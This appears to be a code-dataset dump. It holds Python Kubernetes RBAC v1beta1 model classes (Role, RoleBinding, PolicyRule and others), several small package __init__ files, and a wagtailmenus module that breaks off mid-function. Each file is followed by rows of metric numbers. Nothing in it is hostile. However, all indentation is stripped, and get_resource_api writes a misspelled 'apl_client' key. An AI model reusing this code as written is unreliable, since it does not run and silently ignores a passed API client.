return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "ClusterRoleBindingList":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class ClusterRoleList(_kuber_definitions.Collection):
"""
ClusterRoleList is a collection of ClusterRoles. Deprecated
in v1.17 in favor of rbac.authorization.k8s.io/v1
ClusterRoles, and will no longer be served in v1.20.
"""
def __init__(
self,
items: typing.List["ClusterRole"] = None,
metadata: "ListMeta" = None,
):
"""Create ClusterRoleList instance."""
super(ClusterRoleList, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="ClusterRoleList"
)
self._properties = {
"items": items if items is not None else [],
"metadata": metadata if metadata is not None else ListMeta(),
}
self._types = {
"apiVersion": (str, None),
"items": (list, ClusterRole),
"kind": (str, None),
"metadata": (ListMeta, None),
}
@property
def items(self) -> typing.List["ClusterRole"]:
"""
Items is a list of ClusterRoles
"""
return typing.cast(
typing.List["ClusterRole"],
self._properties.get("items"),
)
@items.setter
def items(self, value: typing.Union[typing.List["ClusterRole"], typing.List[dict]]):
"""
Items is a list of ClusterRoles
"""
cleaned: typing.List[ClusterRole] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
ClusterRole,
ClusterRole().from_dict(item),
)
cleaned.append(typing.cast(ClusterRole, item))
self._properties["items"] = cleaned
@property
def metadata(self) -> "ListMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ListMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ListMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ListMeta,
ListMeta().from_dict(value),
)
self._properties["metadata"] = value
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
kwargs["apl_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "ClusterRoleList":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class PolicyRule(_kuber_definitions.Definition):
"""
PolicyRule holds information that describes a policy rule,
but does not contain information about who the rule applies
to or which namespace the rule applies to.
"""
def __init__(
self,
api_groups: typing.List[str] = None,
non_resource_urls: typing.List[str] = None,
resource_names: typing.List[str] = None,
resources: typing.List[str] = None,
verbs: typing.List[str] = None,
):
"""Create PolicyRule instance."""
super(PolicyRule, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="PolicyRule"
)
self._properties = {
"apiGroups": api_groups if api_groups is not None else [],
"nonResourceURLs": non_resource_urls
if non_resource_urls is not None
else [],
"resourceNames": resource_names if resource_names is not None else [],
"resources": resources if resources is not None else [],
"verbs": verbs if verbs is not None else [],
}
self._types = {
"apiGroups": (list, str),
"nonResourceURLs": (list, str),
"resourceNames": (list, str),
"resources": (list, str),
"verbs": (list, str),
}
@property
def api_groups(self) -> typing.List[str]:
"""
APIGroups is the name of the APIGroup that contains the
resources. If multiple API groups are specified, any action
requested against one of the enumerated resources in any API
group will be allowed.
"""
return typing.cast(
typing.List[str],
self._properties.get("apiGroups"),
)
@api_groups.setter
def api_groups(self, value: typing.List[str]):
"""
APIGroups is the name of the APIGroup that contains the
resources. If multiple API groups are specified, any action
requested against one of the enumerated resources in any API
group will be allowed.
"""
self._properties["apiGroups"] = value
@property
def non_resource_urls(self) -> typing.List[str]:
"""
NonResourceURLs is a set of partial urls that a user should
have access to. *s are allowed, but only as the full, final
step in the path Since non-resource URLs are not namespaced,
this field is only applicable for ClusterRoles referenced
from a ClusterRoleBinding. Rules can either apply to API
resources (such as "pods" or "secrets") or non-resource URL
paths (such as "/api"), but not both.
"""
return typing.cast(
typing.List[str],
self._properties.get("nonResourceURLs"),
)
@non_resource_urls.setter
def non_resource_urls(self, value: typing.List[str]):
"""
NonResourceURLs is a set of partial urls that a user should
have access to. *s are allowed, but only as the full, final
step in the path Since non-resource URLs are not namespaced,
this field is only applicable for ClusterRoles referenced
from a ClusterRoleBinding. Rules can either apply to API
resources (such as "pods" or "secrets") or non-resource URL
paths (such as "/api"), but not both.
"""
self._properties["nonResourceURLs"] = value
@property
def resource_names(self) -> typing.List[str]:
"""
ResourceNames is an optional white list of names that the
rule applies to. An empty set means that everything is
allowed.
"""
return typing.cast(
typing.List[str],
self._properties.get("resourceNames"),
)
@resource_names.setter
def resource_names(self, value: typing.List[str]):
"""
ResourceNames is an optional white list of names that the
rule applies to. An empty set means that everything is
allowed.
"""
self._properties["resourceNames"] = value
@property
def resources(self) -> typing.List[str]:
"""
Resources is a list of resources this rule applies to. '*'
represents all resources in the specified apiGroups. '*/foo'
represents the subresource 'foo' for all resources in the
specified apiGroups.
"""
return typing.cast(
typing.List[str],
self._properties.get("resources"),
)
@resources.setter
def resources(self, value: typing.List[str]):
"""
Resources is a list of resources this rule applies to. '*'
represents all resources in the specified apiGroups. '*/foo'
represents the subresource 'foo' for all resources in the
specified apiGroups.
"""
self._properties["resources"] = value
@property
def verbs(self) -> typing.List[str]:
"""
Verbs is a list of Verbs that apply to ALL the ResourceKinds
and AttributeRestrictions contained in this rule. VerbAll
represents all kinds.
"""
return typing.cast(
typing.List[str],
self._properties.get("verbs"),
)
@verbs.setter
def verbs(self, value: typing.List[str]):
"""
Verbs is a list of Verbs that apply to ALL the ResourceKinds
and AttributeRestrictions contained in this rule. VerbAll
represents all kinds.
"""
self._properties["verbs"] = value
def __enter__(self) -> "PolicyRule":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class Role(_kuber_definitions.Resource):
"""
Role is a namespaced, logical grouping of PolicyRules that
can be referenced as a unit by a RoleBinding. Deprecated in
v1.17 in favor of rbac.authorization.k8s.io/v1 Role, and
will no longer be served in v1.20.
"""
def __init__(
self,
metadata: "ObjectMeta" = None,
rules: typing.List["PolicyRule"] = None,
):
"""Create Role instance."""
super(Role, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="Role"
)
self._properties = {
"metadata": metadata if metadata is not None else ObjectMeta(),
"rules": rules if rules is not None else [],
}
self._types = {
"apiVersion": (str, None),
"kind": (str, None),
"metadata": (ObjectMeta, None),
"rules": (list, PolicyRule),
}
@property
def metadata(self) -> "ObjectMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ObjectMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ObjectMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ObjectMeta,
ObjectMeta().from_dict(value),
)
self._properties["metadata"] = value
@property
def rules(self) -> typing.List["PolicyRule"]:
"""
Rules holds all the PolicyRules for this Role
"""
return typing.cast(
typing.List["PolicyRule"],
self._properties.get("rules"),
)
@rules.setter
def rules(self, value: typing.Union[typing.List["PolicyRule"], typing.List[dict]]):
"""
Rules holds all the PolicyRules for this Role
"""
cleaned: typing.List[PolicyRule] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
PolicyRule,
PolicyRule().from_dict(item),
)
cleaned.append(typing.cast(PolicyRule, item))
self._properties["rules"] = cleaned
def create_resource(self, namespace: "str" = None):
"""
Creates the Role in the currently
configured Kubernetes cluster.
"""
names = ["create_namespaced_role", "create_role"]
_kube_api.execute(
action="create",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict()},
)
def replace_resource(self, namespace: "str" = None):
"""
Replaces the Role in the currently
configured Kubernetes cluster.
"""
names = ["replace_namespaced_role", "replace_role"]
_kube_api.execute(
action="replace",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def patch_resource(self, namespace: "str" = None):
"""
Patches the Role in the currently
configured Kubernetes cluster.
"""
names = ["patch_namespaced_role", "patch_role"]
_kube_api.execute(
action="patch",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def get_resource_status(self, namespace: "str" = None):
"""This resource does not have a status."""
pass
def read_resource(self, namespace: str = None):
"""
Reads the Role from the currently configured
Kubernetes cluster and returns the low-level definition object.
"""
names = [
"read_namespaced_role",
"read_role",
]
return _kube_api.execute(
action="read",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name},
)
def delete_resource(
self,
namespace: str = None,
propagation_policy: str = "Foreground",
grace_period_seconds: int = 10,
):
"""
Deletes the Role from the currently configured
Kubernetes cluster.
"""
names = [
"delete_namespaced_role",
"delete_role",
]
body = client.V1DeleteOptions(
propagation_policy=propagation_policy,
grace_period_seconds=grace_period_seconds,
)
_kube_api.execute(
action="delete",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name, "body": body},
)
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
kwargs["apl_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "Role":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class RoleBinding(_kuber_definitions.Resource):
"""
RoleBinding references a role, but does not contain it. It
can reference a Role in the same namespace or a ClusterRole
in the global namespace. It adds who information via
Subjects and namespace information by which namespace it
exists in. RoleBindings in a given namespace only have
effect in that namespace. Deprecated in v1.17 in favor of
rbac.authorization.k8s.io/v1 RoleBinding, and will no longer
be served in v1.20.
"""
def __init__(
self,
metadata: "ObjectMeta" = None,
role_ref: "RoleRef" = None,
subjects: typing.List["Subject"] = None,
):
"""Create RoleBinding instance."""
super(RoleBinding, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="RoleBinding"
)
self._properties = {
"metadata": metadata if metadata is not None else ObjectMeta(),
"roleRef": role_ref if role_ref is not None else RoleRef(),
"subjects": subjects if subjects is not None else [],
}
self._types = {
"apiVersion": (str, None),
"kind": (str, None),
"metadata": (ObjectMeta, None),
"roleRef": (RoleRef, None),
"subjects": (list, Subject),
}
@property
def metadata(self) -> "ObjectMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ObjectMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ObjectMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ObjectMeta,
ObjectMeta().from_dict(value),
)
self._properties["metadata"] = value
@property
def role_ref(self) -> "RoleRef":
"""
RoleRef can reference a Role in the current namespace or a
ClusterRole in the global namespace. If the RoleRef cannot
be resolved, the Authorizer must return an error.
"""
return typing.cast(
"RoleRef",
self._properties.get("roleRef"),
)
@role_ref.setter
def role_ref(self, value: typing.Union["RoleRef", dict]):
"""
RoleRef can reference a Role in the current namespace or a
ClusterRole in the global namespace. If the RoleRef cannot
be resolved, the Authorizer must return an error.
"""
if isinstance(value, dict):
value = typing.cast(
RoleRef,
RoleRef().from_dict(value),
)
self._properties["roleRef"] = value
@property
def subjects(self) -> typing.List["Subject"]:
"""
Subjects holds references to the objects the role applies
to.
"""
return typing.cast(
typing.List["Subject"],
self._properties.get("subjects"),
)
@subjects.setter
def subjects(self, value: typing.Union[typing.List["Subject"], typing.List[dict]]):
"""
Subjects holds references to the objects the role applies
to.
"""
cleaned: typing.List[Subject] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
Subject,
Subject().from_dict(item),
)
cleaned.append(typing.cast(Subject, item))
self._properties["subjects"] = cleaned
def create_resource(self, namespace: "str" = None):
"""
Creates the RoleBinding in the currently
configured Kubernetes cluster.
"""
names = ["create_namespaced_role_binding", "create_role_binding"]
_kube_api.execute(
action="create",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict()},
)
def replace_resource(self, namespace: "str" = None):
"""
Replaces the RoleBinding in the currently
configured Kubernetes cluster.
"""
names = ["replace_namespaced_role_binding", "replace_role_binding"]
_kube_api.execute(
action="replace",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def patch_resource(self, namespace: "str" = None):
"""
Patches the RoleBinding in the currently
configured Kubernetes cluster.
"""
names = ["patch_namespaced_role_binding", "patch_role_binding"]
_kube_api.execute(
action="patch",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def get_resource_status(self, namespace: "str" = None):
"""This resource does not have a status."""
pass
def read_resource(self, namespace: str = None):
"""
Reads the RoleBinding from the currently configured
Kubernetes cluster and returns the low-level definition object.
"""
names = [
"read_namespaced_role_binding",
"read_role_binding",
]
return _kube_api.execute(
action="read",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name},
)
def delete_resource(
self,
namespace: str = None,
propagation_policy: str = "Foreground",
grace_period_seconds: int = 10,
):
"""
Deletes the RoleBinding from the currently configured
Kubernetes cluster.
"""
names = [
"delete_namespaced_role_binding",
"delete_role_binding",
]
body = client.V1DeleteOptions(
propagation_policy=propagation_policy,
grace_period_seconds=grace_period_seconds,
)
_kube_api.execute(
action="delete",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name, "body": body},
)
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
kwargs["apl_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "RoleBinding":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class RoleBindingList(_kuber_definitions.Collection):
"""
RoleBindingList is a collection of RoleBindings Deprecated
in v1.17 in favor of rbac.authorization.k8s.io/v1
RoleBindingList, and will no longer be served in v1.20.
"""
def __init__(
self,
items: typing.List["RoleBinding"] = None,
metadata: "ListMeta" = None,
):
"""Create RoleBindingList instance."""
super(RoleBindingList, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="RoleBindingList"
)
self._properties = {
"items": items if items is not None else [],
"metadata": metadata if metadata is not None else ListMeta(),
}
self._types = {
"apiVersion": (str, None),
"items": (list, RoleBinding),
"kind": (str, None),
"metadata": (ListMeta, None),
}
@property
def items(self) -> typing.List["RoleBinding"]:
"""
Items is a list of RoleBindings
"""
return typing.cast(
typing.List["RoleBinding"],
self._properties.get("items"),
)
@items.setter
def items(self, value: typing.Union[typing.List["RoleBinding"], typing.List[dict]]):
"""
Items is a list of RoleBindings
"""
cleaned: typing.List[RoleBinding] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
RoleBinding,
RoleBinding().from_dict(item),
)
cleaned.append(typing.cast(RoleBinding, item))
self._properties["items"] = cleaned
@property
def metadata(self) -> "ListMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ListMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ListMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ListMeta,
ListMeta().from_dict(value),
)
self._properties["metadata"] = value
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
kwargs["apl_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "RoleBindingList":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class RoleList(_kuber_definitions.Collection):
"""
RoleList is a collection of Roles Deprecated in v1.17 in
favor of rbac.authorization.k8s.io/v1 RoleList, and will no
longer be served in v1.20.
"""
def __init__(
self,
items: typing.List["Role"] = None,
metadata: "ListMeta" = None,
):
"""Create RoleList instance."""
super(RoleList, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="RoleList"
)
self._properties = {
"items": items if items is not None else [],
"metadata": metadata if metadata is not None else ListMeta(),
}
self._types = {
"apiVersion": (str, None),
"items": (list, Role),
"kind": (str, None),
"metadata": (ListMeta, None),
}
@property
def items(self) -> typing.List["Role"]:
"""
Items is a list of Roles
"""
return typing.cast(
typing.List["Role"],
self._properties.get("items"),
)
@items.setter
def items(self, value: typing.Union[typing.List["Role"], typing.List[dict]]):
"""
Items is a list of Roles
"""
cleaned: typing.List[Role] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
Role,
Role().from_dict(item),
)
cleaned.append(typing.cast(Role, item))
self._properties["items"] = cleaned
@property
def metadata(self) -> "ListMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ListMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ListMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ListMeta,
ListMeta().from_dict(value),
)
self._properties["metadata"] = value
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
kwargs["apl_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "RoleList":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class RoleRef(_kuber_definitions.Definition):
"""
RoleRef contains information that points to the role being
used
"""
def __init__(
self,
api_group: str = None,
kind: str = None,
name: str = None,
):
"""Create RoleRef instance."""
super(RoleRef, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="RoleRef"
)
self._properties = {
"apiGroup": api_group if api_group is not None else "",
"kind": kind if kind is not None else "",
"name": name if name is not None else "",
}
self._types = {
"apiGroup": (str, None),
"kind": (str, None),
"name": (str, None),
}
@property
def api_group(self) -> str:
"""
APIGroup is the group for the resource being referenced
"""
return typing.cast(
str,
self._properties.get("apiGroup"),
)
@api_group.setter
def api_group(self, value: str):
"""
APIGroup is the group for the resource being referenced
"""
self._properties["apiGroup"] = value
@property
def kind(self) -> str:
"""
Kind is the type of resource being referenced
"""
return typing.cast(
str,
self._properties.get("kind"),
)
@kind.setter
def kind(self, value: str):
"""
Kind is the type of resource being referenced
"""
self._properties["kind"] = value
@property
def name(self) -> str:
"""
Name is the name of resource being referenced
"""
return typing.cast(
str,
self._properties.get("name"),
)
@name.setter
def name(self, value: str):
"""
Name is the name of resource being referenced
"""
self._properties["name"] = value
def __enter__(self) -> "RoleRef":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class Subject(_kuber_definitions.Definition):
"""
Subject contains a reference to the object or user
identities a role binding applies to. This can either hold
a direct API object reference, or a value for non-objects
such as user and group names.
"""
def __init__(
self,
api_group: str = None,
kind: str = None,
name: str = None,
namespace: str = None,
):
"""Create Subject instance."""
super(Subject, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="Subject"
)
self._properties = {
"apiGroup": api_group if api_group is not None else "",
"kind": kind if kind is not None else "",
"name": name if name is not None else "",
"namespace": namespace if namespace is not None else "",
}
self._types = {
"apiGroup": (str, None),
"kind": (str, None),
"name": (str, None),
"namespace": (str, None),
}
@property
def api_group(self) -> str:
"""
APIGroup holds the API group of the referenced subject.
Defaults to "" for ServiceAccount subjects. Defaults to
"rbac.authorization.k8s.io" for User and Group subjects.
"""
return typing.cast(
str,
self._properties.get("apiGroup"),
)
@api_group.setter
def api_group(self, value: str):
"""
APIGroup holds the API group of the referenced subject.
Defaults to "" for ServiceAccount subjects. Defaults to
"rbac.authorization.k8s.io" for User and Group subjects.
"""
self._properties["apiGroup"] = value
@property
def kind(self) -> str:
"""
Kind of object being referenced. Values defined by this API
group are "User", "Group", and "ServiceAccount". If the
Authorizer does not recognized the kind value, the
Authorizer should report an error.
"""
return typing.cast(
str,
self._properties.get("kind"),
)
@kind.setter
def kind(self, value: str):
"""
Kind of object being referenced. Values defined by this API
group are "User", "Group", and "ServiceAccount". If the
Authorizer does not recognized the kind value, the
Authorizer should report an error.
"""
self._properties["kind"] = value
@property
def name(self) -> str:
"""
Name of the object being referenced.
"""
return typing.cast(
str,
self._properties.get("name"),
)
@name.setter
def name(self, value: str):
"""
Name of the object being referenced.
"""
self._properties["name"] = value
@property
def namespace(self) -> str:
"""
Namespace of the referenced object. If the object kind is
non-namespace, such as "User" or "Group", and this value is
not empty the Authorizer should report an error.
"""
return typing.cast(
str,
self._properties.get("namespace"),
)
@namespace.setter
def namespace(self, value: str):
"""
Namespace of the referenced object. If the object kind is
non-namespace, such as "User" or "Group", and this value is
not empty the Authorizer should report an error.
"""
self._properties["namespace"] = value
def __enter__(self) -> "Subject":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
| 30.822419 | 88 | 0.566783 | 5,294 | 52,244 | 5.450888 | 0.051001 | 0.036871 | 0.00998 | 0.014416 | 0.831375 | 0.814568 | 0.804103 | 0.791836 | 0.78189 | 0.76134 | 0 | 0.005219 | 0.332459 | 52,244 | 1,694 | 89 | 30.840614 | 0.822222 | 0.21725 | 0 | 0.695076 | 0 | 0 | 0.111998 | 0.037696 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.003788 | 0.007576 | 0.022727 | 0.208333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bc5cc8911f3e6fa65b404e8b78ae32e73d8e3b60 | 1,549 | py | Python | practice/dezero/__init__.py | samrullo/deep-learning-from-scratch-3 | 47f17a9d25c8d40ac635fde7a0e3aa3937ce5ac0 | [
"MIT"
] | null | null | null | practice/dezero/__init__.py | samrullo/deep-learning-from-scratch-3 | 47f17a9d25c8d40ac635fde7a0e3aa3937ce5ac0 | [
"MIT"
] | null | null | null | practice/dezero/__init__.py | samrullo/deep-learning-from-scratch-3 | 47f17a9d25c8d40ac635fde7a0e3aa3937ce5ac0 | [
"MIT"
] | null | null | null | is_simple_core = False
if is_simple_core:
from practice.dezero.core_simple import Variable
from practice.dezero.core_simple import Function
from practice.dezero.core_simple import using_config
from practice.dezero.core_simple import no_grad
from practice.dezero.core_simple import as_array
from practice.dezero.core_simple import as_variable
from practice.dezero.core_simple import setup_variable
from practice.dezero.core_simple import add
from practice.dezero.core_simple import mul
from practice.dezero.core_simple import sub
from practice.dezero.core_simple import rsub
from practice.dezero.core_simple import div
from practice.dezero.core_simple import pow
else:
from practice.dezero.core import Variable
from practice.dezero.core import Parameter
from practice.dezero.core import Function
from practice.dezero.core import using_config
from practice.dezero.core import no_grad
from practice.dezero.core import as_array
from practice.dezero.core import as_variable
from practice.dezero.core import setup_variable
from practice.dezero.core import add
from practice.dezero.core import mul
from practice.dezero.core import sub
from practice.dezero.core import rsub
from practice.dezero.core import div
from practice.dezero.core import pow
from practice.dezero.layers import Model
from practice.dezero.layers import Layer
import practice.dezero.functions
import practice.dezero.utils
setup_variable()
version = "__1.0__"
| 37.780488 | 58 | 0.787605 | 219 | 1,549 | 5.424658 | 0.155251 | 0.36532 | 0.439394 | 0.5 | 0.885522 | 0.792929 | 0.375421 | 0 | 0 | 0 | 0 | 0.001549 | 0.166559 | 1,549 | 40 | 59 | 38.725 | 0.918668 | 0 | 0 | 0 | 0 | 0 | 0.004519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.861111 | 0 | 0.861111 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
bc78b7ea935e1ce840e3f4ab4728a6ddbfb34831 | 44 | py | Python | src/OracleDBLibrary/mapper/__init__.py | adeliogullari/robotframework-oracledb-library | 15392c9218b6a78059b8186ca24b557226383296 | [
"ECL-2.0",
"Apache-2.0"
] | 6 | 2022-02-11T07:05:55.000Z | 2022-03-12T16:55:34.000Z | src/OracleDBLibrary/mapper/__init__.py | adeliogullari/robotframework-oracledb-library | 15392c9218b6a78059b8186ca24b557226383296 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/OracleDBLibrary/mapper/__init__.py | adeliogullari/robotframework-oracledb-library | 15392c9218b6a78059b8186ca24b557226383296 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | from .argument_mapper import ArgumentMapper
| 22 | 43 | 0.886364 | 5 | 44 | 7.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 44 | 1 | 44 | 44 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bcde334e877e220f7e961b5f571da55540d1d932 | 201 | py | Python | d2ix/postprocess/__init__.py | tum-ewk/d2ix_public | dffcb474f51ccdc03a339e306b61b88c224a332d | [
"Apache-2.0"
] | 2 | 2019-12-16T20:48:10.000Z | 2020-11-24T03:20:36.000Z | d2ix/postprocess/__init__.py | tum-ewk/d2ix_public | dffcb474f51ccdc03a339e306b61b88c224a332d | [
"Apache-2.0"
] | 4 | 2019-04-15T08:03:23.000Z | 2019-04-15T08:05:17.000Z | d2ix/postprocess/__init__.py | tum-ewk/d2ix_public | dffcb474f51ccdc03a339e306b61b88c224a332d | [
"Apache-2.0"
] | 8 | 2019-03-13T06:51:22.000Z | 2020-08-31T11:04:56.000Z | from d2ix.postprocess.plot import create_barplot
from d2ix.postprocess.timeseries import create_timeseries_df
from d2ix.postprocess.utils import create_plotdata_df, extract_synonyms_colors, group_data
| 50.25 | 90 | 0.890547 | 28 | 201 | 6.107143 | 0.571429 | 0.140351 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016043 | 0.069652 | 201 | 3 | 91 | 67 | 0.898396 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bcf18922458e6d19a95558c47f23f0f6059d9ae2 | 24 | py | Python | Page/__init__.py | howiemac/image | be5f9c577cfd6502f0c63b42e226f5b101b1966c | [
"BSD-3-Clause"
] | null | null | null | Page/__init__.py | howiemac/image | be5f9c577cfd6502f0c63b42e226f5b101b1966c | [
"BSD-3-Clause"
] | null | null | null | Page/__init__.py | howiemac/image | be5f9c577cfd6502f0c63b42e226f5b101b1966c | [
"BSD-3-Clause"
] | null | null | null | from .Page import Page
| 8 | 22 | 0.75 | 4 | 24 | 4.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208333 | 24 | 2 | 23 | 12 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4c238c594bcc09be0e8cfbe4f7e76aeb9d004524 | 1,864 | py | Python | wagtailmenus/__init__.py | nickyspag/wagtailmenus | e6942e021234c367c40f77a026700751c43ae2c9 | [
"MIT"
] | null | null | null | wagtailmenus/__init__.py | nickyspag/wagtailmenus | e6942e021234c367c40f77a026700751c43ae2c9 | [
"MIT"
] | null | null | null | wagtailmenus/__init__.py | nickyspag/wagtailmenus | e6942e021234c367c40f77a026700751c43ae2c9 | [
"MIT"
] | null | null | null | from wagtailmenus.utils.version import get_version, get_stable_branch_name
# major.minor.patch.release.number
# release must be one of alpha, beta, rc, or final
VERSION = (3, 0, 2, "final", 0)
__version__ = get_version(VERSION)
stable_branch_name = get_stable_branch_name(VERSION)
default_app_config = "wagtailmenus.apps.WagtailMenusConfig"
def get_main_menu_model_string():
"""
Get the dotted ``app.Model`` name for the main menu model as a string.
Useful for developers extending wagtailmenus, that need to refer to the
main menu model (such as in foreign keys), but the model itself is not
required.
"""
from wagtailmenus.conf import settings
return settings.MAIN_MENU_MODEL
def get_flat_menu_model_string():
"""
Get the dotted ``app.Model`` name for the flat menu model as a string.
Useful for developers extending wagtailmenus, that need to refer to the
flat menu model (such as in foreign keys), but the model itself is not
required.
"""
from wagtailmenus.conf import settings
return settings.FLAT_MENU_MODEL
def get_main_menu_model():
"""
Get the model from the ``WAGTAILMENUS_MAIN_MENU_MODEL`` setting.
Useful for developers extending wagtailmenus, and need the actual model.
Defaults to the standard :class:`~wagtailmenus.models.MainMenu` model
if no custom model is defined.
"""
from wagtailmenus.conf import settings
return settings.models.MAIN_MENU_MODEL
def get_flat_menu_model():
"""
Get the model from the ``WAGTAILMENUS_FLAT_MENU_MODEL`` setting.
